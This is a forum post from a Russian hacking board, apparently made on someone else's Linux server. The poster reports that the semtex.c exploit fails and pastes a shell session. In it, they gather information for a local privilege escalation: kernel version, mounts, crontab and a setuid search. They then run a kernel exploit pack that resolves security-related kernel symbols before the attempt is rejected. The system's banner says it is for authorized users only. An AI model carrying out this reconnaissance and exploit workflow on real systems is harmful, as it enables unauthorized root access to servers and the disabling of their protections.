15.07.2015, 13:12
|
|
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
С нами:
7396886
Репутация:
231
|
|
semtex.c не берет
Код:
$ uname -a
Linux host.com 2.6.32-358.14.1.el6.x86_64 #1 SMP Tue Jul 16 23:51:20 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
$ ls -la /boot
total 49531
dr-xr-xr-x. 5 root root 1024 Jul 19 2013 .
dr-xr-xr-x. 23 root root 4096 Jul 9 08:33 ..
-rw-r--r--. 1 root root 171 Jul 17 2013 .vmlinuz-2.6.32-358.14.1.el6.x86_64.hmac
-rw-r--r--. 1 root root 166 Feb 22 2013 .vmlinuz-2.6.32-358.el6.x86_64.hmac
-rw-r--r--. 1 root root 2408392 Jul 17 2013 System.map-2.6.32-358.14.1.el6.x86_64
-rw-r--r--. 1 root root 2407466 Feb 22 2013 System.map-2.6.32-358.el6.x86_64
-rw-r--r--. 1 root root 104086 Jul 17 2013 config-2.6.32-358.14.1.el6.x86_64
-rw-r--r--. 1 root root 104081 Feb 22 2013 config-2.6.32-358.el6.x86_64
drwxr-xr-x. 3 root root 1024 Jul 19 2013 efi
drwxr-xr-x. 2 root root 1024 Oct 15 2014 grub
-rw-r--r--. 1 root root 16210951 Jul 19 2013 initramfs-2.6.32-358.14.1.el6.x86_64.img
-rw-r--r--. 1 root root 16206526 Jul 19 2013 initramfs-2.6.32-358.el6.x86_64.img
-rw------- 1 root root 4563905 Apr 16 02:54 initrd-2.6.32-358.14.1.el6.x86_64kdump.img
drwx------. 2 root root 12288 Jul 19 2013 lost+found
-rw-r--r--. 1 root root 185902 Jul 17 2013 symvers-2.6.32-358.14.1.el6.x86_64.gz
-rw-r--r--. 1 root root 185734 Feb 22 2013 symvers-2.6.32-358.el6.x86_64.gz
-rwxr-xr-x. 1 root root 4045680 Jul 17 2013 vmlinuz-2.6.32-358.14.1.el6.x86_64
-rwxr-xr-x. 1 root root 4043888 Feb 22 2013 vmlinuz-2.6.32-358.el6.x86_64
$ lls -la --full-time /lib
$ lls -la --full-time /lib64
$ mount
/dev/sda2 on / type ext4 (rw,usrjquota=quota.user,jqfmt=vfsv0)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
tmpfs on /dev/shm type tmpfs (rw)
/dev/sda1 on /boot type ext2 (rw)
/dev/sda4 on /tmp type ext4 (rw,noexec,nosuid,nodev)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
/tmp on /var/tmp type none (rw,noexec,nosuid,bind)
$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda2 2.7T 631G 2.0T 25% /
tmpfs 7.8G 0 7.8G 0% /dev/shm
/dev/sda1 97M 51M 42M 55% /boot
/dev/sda4 2.0G 84M 1.8G 5% /tmp
$ cat /etc/issue
This computer system is for authorized users only. Individuals using this
system without authority or in excess of their authority are subject to
having all their activities on this system monitored and recorded or
examined by any authorized person, including law enforcement, as system
personnel deem appropriate. In the course of monitoring individuals
improperly using the system or in the course of system maintenance, the
activities of authorized users may also be monitored and recorded. Any
material so recorded may be disclosed as appropriate. Anyone using this
system consents to these terms.
$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
$ ls -la cron.d,
$ ls -la cron.d
$ ls -la cron.hourly
$ ls -la cron.weekly
$ cat /proc/version
Linux version 2.6.32-358.14.1.el6.x86_64 (mockbuild@c6b10.bsys.dev.centos.org) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-3) (GCC) ) #1 SMP Tue Jul 16 23:51:20 UTC 2013
$ cat /proc/sys/vm/mmap_min_addr
4096
$ ls -la /usr/bin/staprun
---s--x--- 1 root stapusr 183072 Oct 15 2014 /usr/bin/staprun
$ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
-rws--x--x 1 root root 14280 May 27 17:00 /usr/libexec/pt_chown
-rwsr-xr-x 1 abrt abrt 10296 Oct 16 2014 /usr/libexec/abrt-action-install-debuginfo-to-abrt-cache
-rwsr-xr-x 1 root root 257824 Nov 13 2014 /usr/libexec/openssh/ssh-keysign
-rwsr-xr-x 1 root root 14368 Oct 15 2014 /usr/libexec/polkit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 19768 Dec 20 2014 /usr/local/apache/bin/suexec
-rwsr-xr-x 1 root root 19768 Dec 20 2014 /usr/local/apache.backup/bin/suexec
-rws--x--x 1 root root 20184 Oct 15 2014 /usr/bin/chfn
-rwsr-xr-x 1 root root 66352 Apr 7 11:52 /usr/bin/chage
-rwsr-xr-x 1 root root 82752 Mar 19 2014 /usr/bin/quota
-rwsr-xr-x 1 root root 71480 Apr 7 11:52 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 54336 Oct 18 2014 /usr/bin/at
-rwsr-xr-x 1 root root 22544 Oct 15 2014 /usr/bin/pkexec
---s--x--- 1 root stapusr 183072 Oct 15 2014 /usr/bin/staprun
-rwsr-xr-x. 1 root root 30768 Feb 22 2012 /usr/bin/passwd
-rwsr-xr-x 1 root root 36144 Apr 7 11:52 /usr/bin/newgrp
-rwsr-xr-x 1 root root 51784 Nov 23 2013 /usr/bin/crontab
Compiling exp_abacus.c...OK.
Compiling exp_cheddarbay.c...OK.
Compiling exp_ingom0wnar.c...OK.
Compiling exp_moosecox.c...OK.
Compiling exp_paokara.c...OK.
Compiling exp_powerglove.c...OK.
Compiling exp_sieve.c...OK.
Compiling exp_therebel.c...OK.
Compiling exp_vmware.c...failed.
Compiling exp_wunderbar.c...OK.
Choose your exploit:
[0] Abacus: Linux 2.6.37 -> 3.8.8 PERF_EVENTS local root
[1] Ingo m0wnar: Linux 2.6.31 perf_counter local root (Ingo backdoor method)
[2] Sieve: Linux 2.6.18+ move_pages() infoleak
[3] Exit
> 0
------------------------------------------------------------------------------
The limits of my language are the limits of my mind. All I know is what I
have words for. --Wittgenstein
------------------------------------------------------------------------------
[+] Resolved set_fs_root to 0xffffffff811b3030 (via System.map)
[+] Resolved set_fs_pwd to 0xffffffff811b2fc0 (via System.map)
[+] Resolved __virt_addr_valid to 0xffffffff8104bc90 (via System.map)
[+] Resolved init_task to 0xffffffff81a8d020 (via System.map)
[+] Resolved init_fs to 0xffffffff81ad4c40 (via System.map)
[+] Resolved default_exec_domain to 0xffffffff81a9a8a0 (via System.map)
[+] Resolved bad_file_ops to 0xffffffff81621300 (via System.map)
[+] Resolved bad_file_aio_read to 0xffffffff8119e9e0 (via System.map)
[+] Resolved ima_audit to 0xffffffff81fd4c7c (via System.map)
[+] Resolved ima_file_mmap to 0xffffffff8123fa00 (via System.map)
[+] Resolved ima_bprm_check to 0xffffffff8123f9c0 (via System.map)
[+] Resolved ima_file_check to 0xffffffff8123f990 (via System.map)
[+] Resolved selinux_enforcing to 0xffffffff81fd04c4 (via System.map)
[+] Resolved selinux_enabled to 0xffffffff81ae2880 (via System.map)
[+] Resolved security_ops to 0xffffffff81fcec58 (via System.map)
[+] Resolved default_security_ops to 0xffffffff81aded00 (via System.map)
[+] Resolved sel_read_enforce to 0xffffffff8122c120 (via System.map)
[+] Resolved audit_enabled to 0xffffffff81ed6ac4 (via System.map)
[+] Resolved commit_creds to 0xffffffff8109e5c0 (via System.map)
[+] Resolved prepare_kernel_cred to 0xffffffff8109e840 (via System.map)
[+] Resolved xen_start_info to 0xffffffff81ddf308 (via System.map)
[+] Resolved ptmx_fops to 0xffffffff81fdda60 (via System.map)
[+] Resolved mark_rodata_ro to 0xffffffff810459f0 (via System.map)
[+] Resolved set_kernel_text_ro to 0xffffffff81045b80 (via System.map)
[+] Resolved make_lowmem_page_readonly to 0xffffffff81005770 (via System.map)
[+] Resolved make_lowmem_page_readwrite to 0xffffffff81005720 (via System.map)
[!] Securely probing with great effort
[-] System rejected creation of perf event. Either this system is patched, or a previous failed exploit was run against it.
|
|
|